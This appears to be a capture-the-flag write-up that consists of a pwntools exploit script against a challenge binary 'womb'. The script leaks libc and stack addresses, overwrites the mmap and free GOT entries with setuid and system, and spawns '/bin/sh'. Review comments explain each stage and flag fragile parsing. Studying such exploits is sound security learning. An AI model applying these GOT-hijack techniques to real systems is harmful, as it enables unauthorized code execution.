Tags: pwn 

Rating:

```
from pwn import *
from time import sleep
# Challenge binary plus the libc it was shipped with.  Every address computed
# further down is derived from these two ELFs, so the libc here has to be the
# one actually running on the target or the leak-based rebase is wrong.
e = ELF('./womb')
libc = ELF('./libc.so.6')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')   # variant for a purely local run

# Reach the target through the supplied connect.sh wrapper with stdin on a PTY;
# the plain local-process line is kept for debugging.
#p = process('./womb')
p = process(['bash', './connect.sh'], stdin=PTY)
sleep(2)                               # give the wrapper time to connect
p.recv()                               # drain the banner (default, blocking timeout)
p.sendline('/wumb0list/wumb0list')     # presumably selects the challenge on the remote side -- confirm

# From here on every recv() gives up after one second instead of blocking.
context.timeout = 1
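def s(pl, tube=None, delay=0.2):
    """Send one menu answer or payload to the target as a single line.

    The whole exploit is driven through this helper, so it is the script's
    only write primitive.

    Args:
        pl: an int (menu choice / numeric value, sent in decimal), a str, or a
            bytes payload built with p64().  Bytes are sent untouched; anything
            else goes through str().  On Python 2 (str is bytes) this is exactly
            the original str(pl); on Python 3 it avoids sending the repr
            "b'...'" of a packed payload instead of the raw bytes.
        tube: pwntools tube to write to; defaults to the module-level
            connection ``p`` opened at the top of the script.
        delay: seconds to pause before sending so the remote side has consumed
            the previous line; the original hard-coded 0.2s is kept as default.
    """
    sleep(delay)
    if tube is None:
        tube = p
    tube.sendline(pl if isinstance(pl, bytes) else str(pl))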

# ---- Stage 1: leak a libc address through printf's GOT entry ----
# The menu numbers (2 / 1 / 4 / 10 ...) and the payload layout are the
# challenge's own protocol; what each number selects is not recoverable from
# this script alone.  The stage headings below are a reading aid only.
s(2)
s(1)
#gdb.attach(p)
# Four 8-byte pointers: printf@GOT first, then three copies of an address
# inside .bss (e.bss(24)) as filler targets.
s(p64(e.got['printf'])+p64(e.bss(24))*3)
s(4)
s(10)
# Keep reading until a 0x7f byte shows up -- the high byte of a user-space
# libc pointer -- so a leak split across several reads is reassembled before
# it is sliced.
o = ''
while "\x7f" not in o:
    o += p.recv()
# Skip the 23-char 'Enter list number: List' banner plus one separator byte,
# take the next 6 address bytes, pad to 8 and decode little-endian.
# NOTE(review): if the banner is absent, find() returns -1 and this silently
# slices garbage at [23:29]; there is no check on the match.
leak = o[o.find('Enter list number: List')+24:o.find('Enter list number: List')+30].ljust(8,"\x00")
leak = u64(leak)
# Rebase libc from the leaked printf address; every libc symbol used below
# (environ, setuid, system) depends on this being right.
libc.address = leak-libc.symbols['printf']
log.success('libc base: '+hex(libc.address))

# ---- Stage 2: leak a stack address via libc's `environ` ----
s(2)
s(0)
s(1)
# Pointers: environ (the value to be read back), .bss, free@GOT-16, .bss.
s(p64(libc.symbols['environ'])+p64(e.bss(24))+p64(e.got['free']-16)+p64(e.bss(24)))
s(4)
s(10)
# NOTE(review): a single recv() here, unlike the read loop in stage 1 -- if the
# leak arrives in two chunks the 6-byte slice comes up short and u64() sees a
# zero-padded partial address.
o = p.recv()
leak = o[o.find('Enter list number: List')+24:o.find('Enter list number: List')+30].ljust(8,"\x00")
stack = u64(leak)
# `stack` is only logged; nothing later in the script uses it.
log.success('stack leak: '+hex(stack))
# Debug aid for local runs: dump the memory map to sanity-check the leaks.
#f = open('/proc/{}/maps'.format(p.pid),'rb').read()
#print f

# ---- Stage 3: mmap@GOT-16 pointers followed by setuid's address ----
# Presumably a GOT hijack so a later mmap() call lands in setuid(); the exact
# mechanism (what menu 7 / 10 do with the pointers) is not visible here.
s(2)
s(0)
s(1)
# Pointers: environ, mmap@GOT-16, .bss, mmap@GOT-16.
s(p64(libc.symbols['environ'])+p64(e.got['mmap']-16)+p64(e.bss(24))+p64(e.got['mmap']-16))
s(7)
s(10)
# Magic value sent in decimal; its meaning is not recoverable from the script
# (presumably something the target expects before the address write --
# confirm against the binary).
s(0x20272225ffffff)
# setuid's absolute address, sent as a decimal integer.
s(libc.symbols['setuid'])
s(8)
s(1)
s(4)
s('/etc/passwd')
s(5)
s(2)

# ---- Stage 4: same pattern against free@GOT with system's address ----
s(2)
s(0)
s(1)
# Pointers: environ, free@GOT-16, .bss, free@GOT-16.
s(p64(libc.symbols['environ'])+p64(e.got['free']-16)+p64(e.bss(24))+p64(e.got['free']-16))
s(7)
s(10)
# Another opaque magic value (see stage 3).
s(8397322214375197000)
# system's absolute address, sent as a decimal integer.
s(libc.symbols['system'])
#gdb.attach(p)
# Presumably creates an entry holding '/bin/sh' and then releases it, so the
# hijacked free() ends up as system('/bin/sh') -- confirm.
s(1)
s('/bin/sh')
s(2)
s(1)
#p.recv()
# Hand the (hopefully) spawned shell to the user.
p.interactive()

```